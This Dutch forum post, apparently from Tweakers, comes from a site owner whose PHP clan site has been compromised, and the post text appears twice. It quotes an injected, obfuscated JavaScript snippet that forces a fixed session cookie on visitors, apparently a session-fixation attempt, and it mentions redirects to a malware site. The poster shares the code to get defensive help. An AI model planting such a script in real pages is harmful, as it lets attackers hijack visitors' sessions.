Beste medetweakers,
Sinds een aantal dagen ervaar ik problemen met een door mij gehoste site. De hosting wordt gedaan door een redelijk standaard hostingbedrijf dat Plesk gebruikt, en het gaat om een site die in PHP is geschreven.
Wat me de laatste paar dagen opviel was dat er bijna geen gebruikers meer ingelogd waren geweest, en dat er sporadisch "witte schermen" kwamen in plaats van de bedoelde pagina's. Nadat ik vandaag weer eens zo'n witte pagina tegen kwam heb ik eens op de "View Source" knop gedrukt. Wat ik toen zag werd ik niet bepaald vrolijk van:
Nu is mijn Javascript niet vloeiend, maar volgens mij is dit een poging de sessie te kapen.
Zoals jullie begrijpen heb ik vervolgens mijn hele website binnenstebuiten gekeerd. De FTP toegang is al maanden niet gebruikt, en die keer dat hij gebruikt is was ik degene die hem gebruikte. In de Apache access logs kan ik ook niks verdacht vinden - de index-pagina redirect standaard naar een pagina news.php, en dat ging bij elke request die ik deed goed (standaard 302), en ook lijken al mijn DNS settings nog te kloppen.
Een van de andere gebruikers van mijn site wist mij te melden dat hij op een virus download site terecht was gekomen in plaats van de clan site.
Ik heb nu dus twee vragen:
1) Hoe krijgen die grapjassen dit voor elkaar? Wordt de request onderschept op een overgenomen router?
2) Hoe kan ik het voorkomen? Zou het gebruiken van SSL hier een oplossing kunnen bieden?
Ik heb al maatregelen genomen om een session hijack tegen te gaan aan de server side, en de huidige site wordt over 2 maanden sowieso door een andere vervangen. Desnoods kunnen we nu al over naar de nieuwe site, hoewel hier nog redelijk wat functionaliteit mist.
Iemand een idee?
Sinds een aantal dagen ervaar ik problemen met een door mij gehoste site. De hosting wordt gedaan door een redelijk standaard hostingbedrijf dat Plesk gebruikt, en het gaat om een site die in PHP is geschreven.
Wat me de laatste paar dagen opviel was dat er bijna geen gebruikers meer ingelogd waren geweest, en dat er sporadisch "witte schermen" kwamen in plaats van de bedoelde pagina's. Nadat ik vandaag weer eens zo'n witte pagina tegen kwam heb ik eens op de "View Source" knop gedrukt. Wat ik toen zag werd ik niet bepaald vrolijk van:
JavaScript:
1
2
3
4
5
| <script type="text/javascript" language="javascript"> var oigmlob=new Date( ); oigmlob.setTime(oigmlob.getTime( )+030*074*074*01750); document.cookie="sessi\x6f\x6eid=39\x312860\x35A531\x3b pa\x74h=/\x3b ex\x70ir\x65s="+oigmlob.toGMTString( ); </script> |
Nu is mijn Javascript niet vloeiend, maar volgens mij is dit een poging de sessie te kapen.
Zoals jullie begrijpen heb ik vervolgens mijn hele website binnenstebuiten gekeerd. De FTP toegang is al maanden niet gebruikt, en die keer dat hij gebruikt is was ik degene die hem gebruikte. In de Apache access logs kan ik ook niks verdacht vinden - de index-pagina redirect standaard naar een pagina news.php, en dat ging bij elke request die ik deed goed (standaard 302), en ook lijken al mijn DNS settings nog te kloppen.
Een van de andere gebruikers van mijn site wist mij te melden dat hij op een virus download site terecht was gekomen in plaats van de clan site.
Ik heb nu dus twee vragen:
1) Hoe krijgen die grapjassen dit voor elkaar? Wordt de request onderschept op een overgenomen router?
2) Hoe kan ik het voorkomen? Zou het gebruiken van SSL hier een oplossing kunnen bieden?
Ik heb al maatregelen genomen om een session hijack tegen te gaan aan de server side, en de huidige site wordt over 2 maanden sowieso door een andere vervangen. Desnoods kunnen we nu al over naar de nieuwe site, hoewel hier nog redelijk wat functionaliteit mist.
Iemand een idee?
:strip_exif()/u/22670/td_icon2.gif?f=community)
/u/13831/icon.png?f=community){kind=icon}
/u/206605/avatar.png?f=community){kind=avatar}